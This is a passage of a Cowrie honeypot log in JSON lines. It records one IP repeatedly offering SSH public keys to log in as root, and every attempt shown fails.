2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.010556Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.011291Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.164389Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.165189Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.318220Z","src_ip":"212.227.235.229","session":"816cd22aec0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53434,"dst_ip":"1.2.3.4","dst_port":22,"session":"8856cce10f55","protocol":"ssh","message":"New connection: 212.227.235.229:53434 (1.2.3.4:22) [session: 8856cce10f55]","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.469661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.470573Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.623237Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.929585Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:19.930321Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.083985Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.084610Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.237334Z","src_ip":"212.227.235.229","session":"8856cce10f55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53444,"dst_ip":"1.2.3.4","dst_port":22,"session":"718f76a859d0","protocol":"ssh","message":"New connection: 212.227.235.229:53444 (1.2.3.4:22) [session: 718f76a859d0]","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.387053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.388810Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.539945Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.844388Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.845292Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.998563Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:20.999283Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.151258Z","src_ip":"212.227.235.229","session":"718f76a859d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53446,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a54b31d15e6","protocol":"ssh","message":"New connection: 212.227.235.229:53446 (1.2.3.4:22) [session: 3a54b31d15e6]","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.296970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.297948Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.443035Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.735493Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.736137Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.882528Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:21.883221Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
